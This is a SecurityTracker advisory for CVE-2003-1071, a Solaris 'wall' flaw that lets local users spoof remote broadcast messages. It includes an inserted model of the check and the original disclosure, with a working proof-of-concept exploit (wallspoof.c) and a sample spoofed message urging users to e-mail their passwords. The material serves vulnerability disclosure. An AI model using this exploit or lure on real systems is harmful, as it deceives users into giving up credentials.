SecurityTracker.com
Category:   OS (UNIX)  >   wall (/usr/sbin/wall)
Vendors:   Sun
'wall' (/usr/sbin/wall) Bug Lets Local Users Spoof Broadcast Messages
SecurityTracker Alert ID:  1005882
SecurityTracker URL:  http://securitytracker.com/id/1005882
CVE Reference:   CVE-2003-1071   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Jan 3 2003
Impact:   Modification of system information
Exploit Included:  Yes  
Version(s): Solaris 2.x, 7, 8, 9
Description:   A vulnerability was reported in the wall application on Sun Solaris and possibly other UNIX operating systems. A local user can send spoofed messages.

It is reported that a local user can broadcast spoofed messages to all users currently logged in on the system.

According to the report, the /usr/sbin/wall application determines whether a message was sent by a local user or a remote user by checking whether the file descriptor pointed to by stderr corresponds to a tty. If it does not, the application checks whether the first 5 bytes of the message are "From ", followed ultimately by a character string in the form of 'user@host'. A local user can therefore spoof an 'rpc.walld' message by closing stderr before executing /usr/sbin/wall and then sending a bogus "From " header. A local user can exploit this to attempt to convey apparently official messages to users on the system.

A demonstration exploit transcript and code are provided in the Source Message.
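
The origin check described above, modelled as an added example (it is not Sun's code or patch and is not part of the original advisory): classify_weak reproduces the decision that trusts a non-tty stderr plus a "From user@host" header, and classify_hardened shows one possible correction that also requires real uid 0, on the assumption that the daemon relaying remote messages runs as root. All function and type names are hypothetical.

```c
/* Added example: models the sender-origin decision described above.
 * Names are hypothetical; this is not Sun's source code or its patch. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

enum origin { ORIGIN_LOCAL, ORIGIN_REMOTE };

/* Returns 1 if msg starts with "From " followed by a user@host token. */
static int has_from_header(const char *msg)
{
    const char *p, *start, *at = NULL;

    if (strncmp(msg, "From ", 5) != 0)
        return 0;
    p = msg + 5;
    while (isspace((unsigned char)*p))   /* skip extra whitespace */
        p++;
    for (start = p; *p && !isspace((unsigned char)*p) && *p != ':'; p++)
        if (*p == '@' && at == NULL)
            at = p;
    /* require a non-empty user before '@' and a non-empty host after */
    return at != NULL && at > start && p > at + 1;
}

/* Flawed rule from the advisory: a non-tty stderr plus the header is
 * enough for the caller to be treated as the remote relay. */
enum origin classify_weak(int stderr_is_tty, const char *msg)
{
    return (!stderr_is_tty && has_from_header(msg)) ? ORIGIN_REMOTE : ORIGIN_LOCAL;
}

/* Hardened rule (assumption): also require real uid 0, on the premise
 * that the daemon relaying remote messages runs as root. */
enum origin classify_hardened(int stderr_is_tty, uid_t real_uid, const char *msg)
{
    if (real_uid != 0)
        return ORIGIN_LOCAL;   /* unprivileged callers are always local */
    return classify_weak(stderr_is_tty, msg);
}

int main(void)
{
    const char *msg = "From root@localhost:maintenance tonight"; /* constructed */
    printf("weak, uid 1000, stderr closed: %d\n", classify_weak(0, msg));
    printf("hardened, uid 1000, stderr closed: %d\n", classify_hardened(0, 1000, msg));
    return 0;
}
```

In a real program the two inputs would come from isatty(2) and getuid(); they are passed as parameters here so the decision can be exercised without a terminal.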

Impact:   A local user can send a message to all logged in users on the system that appears to be a remotely generated broadcast message from an arbitrary source.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com (Links to External Site)
Cause:   State error
Underlying OS:  

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Sun Issues Fix) Re: 'wall' (/usr/sbin/wall) Bug Lets Local Users Spoof Broadcast Messages
Sun has issued patches.



 Source Message Contents

Date:  Fri, 3 Jan 2003 11:53:17 -0500 (EST)
Subject:  Solaris 2.x /usr/sbin/wall Advisory



Affected Operating System(s):  Solaris 2.x-9
   Possibly others derived from AT&T source code.

Affected Program:  /usr/sbin/wall

Synopsis:
  Wall is a setgid tty program that broadcasts a message to every user
currently logged into the system.  It can also receive messages from
remote hosts, via RPC (rpc.walld).
  The way that wall differentiates between messages sent by local and
remote users is by checking if the file descriptor pointed to by stderr
corresponds to a tty.  If it doesn't, wall checks if the first 5 bytes of
the message are "From ".  If this is true, the next non-white characters
must be in the form of user@host.  One can simulate an rpc.walld message
by simply closing stderr before executing /usr/sbin/wall and sending a
fake "From " header.
  If this is achieved, it may be possible (by pretending to be an
administrator), to fool users into doing things they wouldn't normally do!

Example:

> ./wallspoof root@localhost
Enter your message below.  End your message with an EOF (Control+D).
We'll be upgrading the system tonight.  Everyone needs to e-mail their
passwords to suprhakr (he's in charge of security).  If you don't do this
you won't have an account in the morning.  Thanks.
<Done>
Broadcast Message from root (rpc.rwalld) on localhost Fri Jan  3
09:39:49...
>From root@localhost:We'll be upgrading the system tonight.  Everyone needs
to e-mail their passwords to suprhakr (he's in charge of security).  If
you don't do this you won't have an account in the morning.  Thanks.
>

This is how easily users can be tricked!

I believe this is a serious vulnerability, one which requires an IMMEDIATE
patch from Sun.  Anyone who runs Solaris is at risk.  You have probably
already been owned.

Proof of concept:

/*
 wallspoof.c - SOLARIS (X86/SPARC) Exploit
 Don't use this in a malicious way! (i.e. to own people)
 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  char *userhost;
  char mesg[2050];
  FILE *tmp;
  if (argc < 2) {
    fprintf (stderr, "usage: wallspoof user@host\n");
    exit (-1);
  }
  userhost = argv[1];
  /* Stage the message in a temporary file that wall will read on stdin. */
  if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {
    perror ("open");
    exit (-1);
  }
  printf ("Enter your message below.  End your message with an EOF (Control+D).\n");
  /* Prepend the "From user@host:" header that wall expects from rpc.walld. */
  fprintf (tmp, "From %s:", userhost);
  while (fgets(mesg, sizeof(mesg), stdin) != NULL)
    fprintf (tmp, "%s", mesg);
  fclose (tmp);
  /* Close stderr so that wall's tty check on it fails. */
  fclose (stderr);
  printf ("<Done>\n");
  system ("/usr/sbin/wall < /tmp/rxax");
  unlink ("/tmp/rxax");
  return 0;
}

 
 


Copyright 2014, SecurityGlobal.net LLC